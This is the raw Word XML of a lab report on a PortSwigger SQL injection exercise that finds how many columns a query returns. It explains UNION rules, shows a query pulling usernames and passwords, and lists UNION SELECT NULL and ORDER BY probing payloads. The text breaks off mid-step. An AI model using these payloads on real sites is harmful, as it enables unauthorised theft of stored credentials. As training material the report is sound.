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A790" w14:textId="2D9B04B3" w:rsidR="006939F6" w:rsidRPr="003B7E47" w:rsidRDefault="004D516A" w:rsidP="004D516A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7E47">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7E47">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> PoC Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F2378" w14:textId="76E854CD" w:rsidR="003B7E47" w:rsidRDefault="003B7E47" w:rsidP="003B7E47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D94014E" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Lab Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD1EAFD" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="00A84562" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r w:rsidRPr="006939F6">
        <w:t>SQL injection UNION attack, determining the number of columns returned by the query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F72693" w14:textId="77777777" w:rsidR="00A84562" w:rsidRPr="006939F6" w:rsidRDefault="00A84562" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1822F037" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Vulnerability Type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F663205" w14:textId="77777777" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r w:rsidRPr="00A84562">
        <w:t>SQL Injection (SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914EF9F" w14:textId="77777777" w:rsidR="00A84562" w:rsidRPr="00A84562" w:rsidRDefault="00A84562" w:rsidP="006939F6"/>
    <w:p w14:paraId="5E999A98" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654373DC" w14:textId="77777777" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r w:rsidRPr="006939F6">
        <w:t>Exploited a SQL injection vulnerability in the product category filter to determine how many columns the original SQL query was returning. This was achieved using the ORDER BY technique and later confirmed with UNION SELECT NULL payloads. Identifying the correct number of columns is a critical prerequisite for performing successful UNION-based SQL injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083000F" w14:textId="77777777" w:rsidR="00A84562" w:rsidRDefault="00A84562" w:rsidP="006939F6"/>
    <w:p w14:paraId="559F87B2" w14:textId="38530DC1" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. Lab description (as per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>portswigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> lab website)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23559737" w14:textId="77777777" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r>
        <w:t>This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431320FE" w14:textId="77777777" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r>
        <w:t>To solve the lab, determine the number of columns returned by the query by performing a SQL injection UNION attack that returns an additional row containing null values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AE3ECF" w14:textId="41AB9E3C" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00863D55">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>End Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00863D55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0016402C">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00863D55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0016402C">
        <w:t>Determine the number of columns returned by the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57848753" w14:textId="77777777" w:rsidR="00A84562" w:rsidRDefault="00A84562" w:rsidP="006939F6"/>
    <w:p w14:paraId="3AD3DC36" w14:textId="0117701D" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF58D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF58D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Theory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33149A22" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB3E5FF" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF58D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Background knowledge (UNION query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8B546F" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6"/>
    <w:p w14:paraId="1832F647" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r w:rsidRPr="00EF58D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tabel1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00EF58D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tabel2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761EADFF" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>a | b</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>c | d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12061649" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>2 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E91B1BC" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065C2A27" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6"/>
    <w:p w14:paraId="18C9DE21" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="00A84562" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A84562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Query 1 - select a, b from table1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135B682A" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve">result - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B7D45F" w14:textId="100CC31C" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5B146F" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6"/>
    <w:p w14:paraId="402BAA96" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="00A84562" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A84562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query 2 - select a, b from table1 UNION select c, d from table2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C022C" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve">result - </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272C4F57" w14:textId="2C910DBC" w:rsidR="00EF58D6" w:rsidRDefault="00D548F4" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF58D6">
        <w:t>3 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF58D6">
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC9206" w14:textId="15EBF69E" w:rsidR="00EF58D6" w:rsidRDefault="00D548F4" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidR="00EF58D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF58D6">
        <w:t>2 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF58D6">
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AACCB8" w14:textId="4E53C836" w:rsidR="00EF58D6" w:rsidRDefault="00D548F4" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:r w:rsidR="00EF58D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF58D6">
        <w:t>4 ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF58D6">
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C6ED5" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6"/>
    <w:p w14:paraId="7B315CFE" w14:textId="3E5BBEF9" w:rsidR="00EF58D6" w:rsidRDefault="002105E4" w:rsidP="00EF58D6">
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00EF58D6">
        <w:t xml:space="preserve">ased on this, we can create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00EF58D6">
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF58D6">
        <w:t xml:space="preserve"> attack query such that it can retrieve real sensitive info from the database if the website is vuln to SQLi like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC98911" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="002105E4" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002105E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select product1, product2 from table1 UNION select username, password from users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619C1057" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2BB82A" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="002105E4" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002105E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rules for using the union operator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174505F1" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>- The number and the order of the columns must be the same in all queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E01AA7E" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>- The data types must be compatible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F6899A" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6"/>
    <w:p w14:paraId="11A6BF84" w14:textId="12486F4B" w:rsidR="002105E4" w:rsidRDefault="002105E4" w:rsidP="00EF58D6">
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00EF58D6">
        <w:t>e can use different SQLi attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C481DC" w14:textId="78B99C8B" w:rsidR="00EF58D6" w:rsidRPr="00A84562" w:rsidRDefault="00A84562" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00EF58D6" w:rsidRPr="002105E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ay 1 (iterative attack):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA37960" w14:textId="0B5B2B45" w:rsidR="002105E4" w:rsidRPr="00A84562" w:rsidRDefault="00EF58D6" w:rsidP="00A84562">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A84562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A84562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A84562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tablel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A84562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION select NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710AF62" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>- error -&gt; incorrect number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5625298D" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7F63D" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E7135" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>doing it iteratively</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9B912" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503DD7EE" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F91B0FB" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="00A84562" w:rsidRDefault="00EF58D6" w:rsidP="00A84562">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A84562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A84562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from table1 UNION select NULL, NULL, NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433F8020" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>-200 response code -&gt; correct number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762317AD" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6"/>
    <w:p w14:paraId="3B502FB3" w14:textId="2DFCF0F3" w:rsidR="00EF58D6" w:rsidRPr="002105E4" w:rsidRDefault="00A84562" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00EF58D6" w:rsidRPr="002105E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ay 2 (using order by clause):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42B694" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6"/>
    <w:p w14:paraId="3063095C" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="002105E4" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002105E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select a, b from table1 order by 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626ACDBC" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="002105E4" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002105E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select a, b from table1 order by 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366391CB" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRPr="002105E4" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002105E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>select a, b from table1 order by 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DCF330" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6A3521" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448511C6" w14:textId="77777777" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462E32BC" w14:textId="4007AA27" w:rsidR="00EF58D6" w:rsidRDefault="00EF58D6" w:rsidP="00EF58D6">
      <w:r>
        <w:t xml:space="preserve">we can keep doing this until we get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> internal server error, which is another way of determining the number of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F25E6C" w14:textId="77777777" w:rsidR="002105E4" w:rsidRDefault="002105E4" w:rsidP="00EF58D6"/>
    <w:p w14:paraId="65AC4F02" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5FE854" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confirmed SQL injection vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6060A7DE" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">Injected a single quote (') at the end of the URL after selecting </w:t>
      </w:r>
      <w:r>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve"> category.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7714E92E" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">Application responded with </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:t>, confirming SQL syntax error → hence injectable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78427B60" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:r>
        <w:pict w14:anchorId="5A8A2254">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="298400D8" w14:textId="77777777" w:rsidR="006939F6" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D516A">
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:r w:rsidRPr="004D516A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Determined number of columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7636664E" w14:textId="495D4EB7" w:rsidR="003157B8" w:rsidRPr="004D516A" w:rsidRDefault="003157B8" w:rsidP="006939F6">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Way 1 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482138C2" w14:textId="77777777" w:rsidR="006939F6" w:rsidRPr="004D516A" w:rsidRDefault="006939F6" w:rsidP="006939F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
